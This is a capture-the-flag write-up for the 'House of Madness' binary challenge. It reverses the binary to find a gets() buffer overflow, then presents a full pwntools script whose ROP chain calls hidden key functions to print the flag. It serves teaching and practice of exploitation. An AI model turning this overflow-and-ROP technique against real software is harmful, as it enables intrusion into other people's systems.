Welcome to the House of Madness. Can you pwn your way to the keys to get the relic?
nc challenges.auctf.com 30012
Note: ASLR is disabled for this challenge
The corresponding binary is given.
Let's connect to the server and play a little bit with the game. We can enter rooms, get information about them. Most rooms are uninteresting, except room 4, which allow us to enter input and echoes it back. Plus when trying to quit the game, it prompts us to try to enter Stephen in room 4, and then we get to a hidden room, where we can also give an input.
Let's reverse the binary with Ghidra to find vulnerabilities. Most functions behave as they should, and there are no input vulnerabilities such as buffer overflow or format strings, except for the input we can insert in the hidden room.
void room4(void)
{
int iVar1;
char local_2c [16];
char local_1c [20];
puts("Wow this room is special. It echoes back what you say!");
while( true ) {
if (unlockHiddenRoom4 != '\0') {
puts("Welcome to the hidden room! Good Luck");
printf("Enter something: ");
gets(local_1c);
return;
}
printf("Press Q to exit: ");
fgets(local_2c,0x10,stdin);
remove_newline(local_2c);
printf("\tYou entered \'%s\'\n",local_2c);
iVar1 = strcmp(local_2c,"Q");
if (iVar1 == 0) break;
iVar1 = strcmp(local_2c,"Stephen");
if (iVar1 == 0) {
unlockHiddenRoom4 = '\x01';
}
}
return;
}Indeed, input in the hidden room is read with gets which is vulnerable to buffer overflows. We see a function get_flag, so let's jump there with our buffer overflow.
Sadly this is not that easy, as several checks are performed before printing the flag. As the flag is opened before the checks, we cannot bypass them by jumping in the middle of function. So let's try to get those checks true.
void get_flag(void)
{
int iVar1;
char local_60 [64];
FILE *local_20;
local_20 = fopen("flag.txt","r");
if (local_20 == (FILE *)0x0) {
puts("\'flag.txt\' missing in the current directory!");
/* WARNING: Subroutine does not return */
exit(0);
}
if ((((key1 != '\0') && (key2 != '\0')) && (iVar1 = strcmp(key3,"Dormammu"), iVar1 == 0)) &&
((key4._4_4_ ^ 0x537472 | (uint)key4 ^ 0x616e6765) == 0)) {
fgets(local_60,0x40,local_20);
printf("Damn you beat the house: %s\n",local_60);
return;
}
if (((key1 != '\0') && (key2 != '\0')) && (iVar1 = strcmp(key3,"Dormammu"), iVar1 == 0)) {
printf("Surrender, Stephen. Surrender to the reverser");
return;
}
if ((key1 == '\0') || (key2 == '\0')) {
printf("It\'s not going to be that easy. Come on");
}
else {
puts("You think you are ready? You are ready when the relic decides you are ready.");
}
return;
}There are 4 steps:
- setting
key1to a non zero value - setting
key2to a non zero value - setting
key3toDormammu - setting
key4to a defined value.
Hopefully, we can see that several functions do this for us:
void get_key1(int param_1)
{
int iVar1;
iVar1 = __x86.get_pc_thunk.ax();
if ((*(char *)(iVar1 + 0x296b) == '\x01') || (param_1 != -0x1123f22)) {
if (*(char *)(iVar1 + 0x296b) == '\x01') {
if (*(char *)(iVar1 + 0x296b) == '\0') {
puts((char *)(iVar1 + 0xcf6));
}
else {
puts((char *)(iVar1 + 0xcd9));
}
}
else {
puts((char *)(iVar1 + 0xc76));
}
}
else {
*(undefined *)(iVar1 + 0x296c) = 1;
}
return;
}
void get_key2(void)
{
int iVar1;
if ((key1 != '\x01') && (iVar1 = strcmp(key3,"Dormammu"), iVar1 == 0)) {
key2 = 1;
return;
}
puts("Need to get the right keys. Reverse the house harder");
return;
}
void set_key4(void)
{
int iVar1;
if ((((isInRoom != '\x01') && (key1 != '\0')) && (key2 != '\0')) &&
(iVar1 = strcmp(key3,"Dormammu"), iVar1 == 0)) {
key4._0_4_ = 0x616e6765;
key4._4_4_ = 0x537472;
return;
}
puts("Need to get the right keys. Reverse the house harder");
return;
}
void AAsDrwEk(void)
{
int iVar1;
iVar1 = __x86.get_pc_thunk.ax();
*(int *)(iVar1 + 0x286b) = iVar1 + 0xc40;
return;
}So we can see that we need to call them in the correct order:
- first call
AAsDrwEkto setkey3(we see with a debugger that the stringDormammuis located atiVar1 + 0xc40andiVar1 + 0x286biskey3) - second call is
get_key2because it needskey1to not be1. It setskey2to1 - third call is to
get_key1, and we should provide it an argument (on the stack) to be0xfeedc0de. - fourth call is to
set_key4, which require all previous arguments to be set in order to setkey4to the correct value. - last, we can call
get_flag.
Therefore our payload to overflow the return address is the following:
- some characters to overflow the buffer, other local variables on the stack and the
ebppointer. Next value will be the return value. - address of
AAsDrwEk - address of
get_key2 - address of
get_key1. We need to give it an argument, and by debugging we see that it fetches the value of the argument two values deeper in the stack - this place will be the function called after
get_key1. As we're pushing an argument on the stack, we want to remove it, so let's use a gadget here. 0xfeedc0deas argument toget_key1- address of
set_key4 - address of
get_flag
As we're pushing an argument on the stack, we'll want to pop it. To this end let's use a gadget to pop a value on the stack.
To find one, we use ROPGadget.
With this we find our gadget (we need to add the constant offset but this is known with gdb).
Finally we have our chain!
from pwn import *
sh = remote("challenges.auctf.com", 30012)
# First get to hidden room
print(sh.recvuntil("Your choice:").decode())
sh.sendline("2")
print(sh.recvuntil("Choose a room to enter:").decode())
sh.sendline("4")
print(sh.recvuntil("Your choice:").decode())
sh.sendline("3")
print(sh.recvuntil("Press Q to exit:").decode())
sh.sendline("Stephen")
print(sh.recvuntil("Enter something:").decode())
# Craft payload
AAsDrwEk = 0x565567cd
get_key1 = 0x565566de
get_key2 = 0x5655676e
get_flag = 0x5655686b
popgadget = 0x5655601e
set_key4 = 0x565567e9
feedcode = 0xfeedc0de
payload = b'0'*28 + p32(AAsDrwEk) + p32(get_key2) + p32(get_key1) + p32(popgadget) + p32(feedcode) + p32(set_key4) + p32(get_flag)
print(payload)
sh.sendline(payload)
sh.interactive()Flag: auctf{gu3ss_th3_h0us3_1sn't_th4t_m4d}